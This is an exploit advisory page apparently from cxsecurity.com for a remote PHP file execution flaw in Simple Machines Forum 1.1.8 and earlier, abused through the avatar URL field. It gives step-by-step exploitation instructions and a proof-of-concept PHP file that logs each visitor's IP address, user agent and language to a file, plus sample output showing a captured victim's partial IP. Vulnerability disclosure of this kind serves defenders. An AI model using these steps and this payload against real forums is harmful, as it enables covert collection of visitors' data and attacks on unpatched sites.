Simple Machines Forum 1.1.8 avatar related remote php file

2010.03.29
Credit: JosS
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Simple Machines Forum <= 1.1.8 (avatar) Remote PHP File Execute PoC bug found by Jose Luis Gongora Fernandez (a.k.a) JosS contact: sys-project[at]hotmail.com website: http://www.hack0wn.com/ - About Vulnerability: This vulnerability allow execute a php external file in any visitor of the forum. The php file should have the malicious code. The scope of the attack depends on the strength of the php file. - Step by Step: 1) go to your profile in section of avatar. 2) put the url of the malicious php file as avatar (ex: http://target/poc.php). 3) create a new topic. - [victims] All the people that visit the topic will be infect. malicious file example [steal info]: (poc.php) <?php $ip = $_SERVER['REMOTE_ADDR']; $so= $_SERVER['HTTP_USER_AGENT']; $lan= $_SERVER['HTTP_ACCEPT_LANGUAGE']; $url= $_SERVER['PHP_SELF']; $path= $_SERVER['DOCUMENT_ROOT']; $archivo = 'hacks.txt'; $fp = fopen($archivo, "a"); $string = " Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC by Jose Luis Gongora Fernandez (aka) JosS $path$url VICTIM: $ip info: $so language: $lan "; $write = fputs($fp, $string); fclose($fp); ?> ------END----- cat hacks.txt Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC by Jose Luis Gongora Fernandez (aka) JosS /***/***/vhosts/hack0wn.com/httpdocs/poc.php VICTIM: 88.25.92.*** info: Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.19) Gecko/20081202 Iceweasel/2.0.0.19 (Debian-2.0.0.19-0etch1) language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3 // tested on smf 1.1.8 __h0__ ________________________________ ?Sabes que la Videollamada de Messenger es GRATIS ?Descbrela!<http://events.es.msn.com/windows-live/redes-sociales/default.aspx>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top